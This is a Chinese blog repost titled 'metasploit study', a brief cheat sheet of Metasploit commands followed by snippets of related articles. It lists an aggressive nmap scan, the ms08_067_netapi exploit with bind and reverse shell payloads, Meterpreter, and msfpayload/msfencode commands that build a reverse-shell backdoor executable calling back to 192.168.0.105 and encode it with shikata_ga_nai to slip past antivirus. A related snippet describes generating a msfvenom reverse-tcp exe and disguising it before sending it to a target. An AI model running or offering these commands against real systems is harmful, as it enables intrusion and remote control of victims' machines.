metasploit study

最新推荐文章于 2024-06-23 12:10:55 发布
最新推荐文章于 2024-06-23 12:10:55 发布
阅读量75 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/shanmao/p/3335045.html
版权

load db_tracker
db_nmap -T Aggressive -sV -n -O -v 192.168.0.107


绑定shell
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/bind_tcp

反弹shell
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/reverse_tcp

Meterpreter方式
set PAYLOAD windows/meterpreter/reverse_tcp

生成后门
/msfpayload windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=33333 O
./msfpayload windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=33333 X > /root/server.exe 


加密后门
./msfpayload windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=33333 R | ./msfencode -e x86/shikata_ga_nai -t exe > /root/server1.exe


自动化浏览器攻击
use auxiliary/server/browser_autopwn

转载于:https://www.cnblogs.com/shanmao/p/3335045.html

dgitra7963
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
初探Metasploit的自动攻击
要不,单步调试走起?
01-08 1万+
本文总结下研究强大渗透平台:Metasploit结合强大的扫描器:Nessus,nmap后的自动攻击手法。
基于MetaSploit的网络攻击研究
毕业作品网站
02-11 678
摘 要 信息技术的高速发展使作为信息主要载体的网络现代化程度代表国家信息化发展的标志,更成为推进高科技产业发展的动力、国家实现现代化的根本途径之一。由于网络在当今世界国民经济中的重要性,网络也就成为信息安全攻防的主战场。 本文从网络安全现状入手,深入分析网络攻击的根源,对网络攻击原理进行深入、细致剖析,全面分类阐述网络攻击的主要手段与实现方法,对目前常见攻击手段和工具,做了细致的分析,给出了他们的特点和实施方法。在分析各类攻击分类的基础上, 对MetaSploit攻击平台进行研究,实现如何利用漏洞,如何进行
内网study
qq_53142368的博客
10-08 420
主要针对windows内网学习
第三章-4 Metasploit漏洞利用模块
划水的小白白
05-13 615
每日一句: 如何一别朱仙镇,不见将军奏凯歌。 ——于谦《岳忠武王祠》 本文内容: ~快速搭建有限制的测试环境 ~实战漏洞利用 ~MSF会话常用命令 ~其他问题补充 一、快速搭建有限制的测试环境 问:搭建测试环境的作用是什么? 答:在本地测试漏洞,然后授权的情况下进行相关漏洞挖掘 0,安装虚拟机,win server2008 1,安装phpstudy ~百度,PHP study,进官网直接下载就行 ~安装PHP study可能需要一些环
msf生成webshell_metasploit生成木马获取windowns控制权
weixin_39853968的博客
12-22 558
放纵自己的欲望是最大的祸害;谈论别人的隐私是最大的罪恶;不知自己过失是最大的病痛。 ——亚里士多德写在前面本想介绍几种生成免杀木马的方法,但经过实验发现这几种方法已经失效,可以被360或者腾讯安全管家查杀。所以本文的木马不具备免杀功能。准备环境:入侵机器:kali linux (IP地址:192.168.96.128)靶机:window server 2003 (IP地址:192.168.96.1...
Start Postgresql within Metasploit 4.4
weixin_30807677的博客
05-26 42
Followingtheinstructioninthebook"MetasploitThePenetrationTester'sGuide",iusedtostudypenetration,iamstuckedatpage20whenpracticethisinstruction: ======================== root@...
Kali利用metasploit 生成后门程序,操作目标主机cmd
qq_19641369的博客
11-27 4430
一.利用命令生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe LHOST:表示本机地址 -f :表示生成程序的后缀 met:文件名 可以自定义 把生成的exe文件发送给目标主机执行,注意记得伪装下否则会被杀毒软件识别,我这里是利用打包命令将其打包,然后发送到目标主机执行。 二.msfconsole 命令打开控制台 root@...
A Simple Study on Kali Linux
独行者103的专栏
11-03 425
Once upon of time, I heard about Kali Linux, a powerful tool of penetration testers, which is including metasploit and other various kinds of tools. What interests me is the metasploit which can hacki
Pentesting Vulnerable Study Frameworks Complete List
cnbird's blog
08-13 1206
It’s very difficult for the beginner security analyst, mainly the ones interested in the area of pentesting, to find good study pentesting resources. Starting from the principle that in pentesting the
metasploitframework框架
09-28
metasploit-framework-V6.1.8适用于Windows系统。 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
Metasploit教程
06-07
Metasploit教程Metasploit教程Metasploit教程Metasploit教程
metasploit
12-19
后渗透的多种方法,meterpreter 在获取shell之后,如何持续控制目标主机,即在目标主机重启或下次开机后能自动连接到攻击主机上,不必每次都需要进行攻击取得 meterpreter。
Metasploit.zip
08-11
Metasploit安装包
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
最新发布
HACKONE的博客
06-23 91
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
Linux命令运行时的进程关系
ZMXdecode的博客
06-20 552
如上图可以看出,第一次什么都不做,使用ps -f 命令,就可以看到 有bash的进程,这个就是父shell, 然后我们再输入bash 命令,输入后,看不出任何变化,但实际上,已经又生成了一个子shell. 从图中可以看出,新生成的子shell的PID是537699,这个shell的父进程是 537377. 然后我们看父shell的PID就是 537377。shell是一个命令行解释器工具,它是一个时刻都在运行的程序,当我们在命令行输入命令,shell会去解释执行这个命令。建命令的操作方式大不相同。
红日渗透靶场测试(1)
2302_78903258的博客
06-18 956
我是根据此位博客的内容进行操作的,大家如果看不懂我内容的话,可以看看这位博客,里面的环境配置很详细。
linux远程访问及控制
2401_85084312的博客
06-17 1158
OpenSSHsshd 服务使用的默认端口号为 22,必要时建议修改此端口号,并指定监听服务的具体IP 地址,以提高在网络中的隐蔽性。
[Shell编程学习路线]——if条件语句(单,双,多分支结构)详细语法介绍
博客之路,前途漫漫
06-17 1014
条件语句是编程中的基本构建块之一,if语句在Shell脚本中起着至关重要的作用。通过if语句,你可以根据不同的条件执行不同的代码,从而使脚本具备决策能力和灵活性。本篇指南将详细介绍Shell中的if条件语句,包括单分支、双分支和多分支结构,帮助你掌握条件判断的基本语法和使用技巧。无论是简单的判断还是复杂的条件组合,这里都有你需要的知识。让我们一同学习如何编写更智能、更高效的Shell脚本吧!在学习Shell编程时,掌握if条件语句是非常关键的一步。if。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值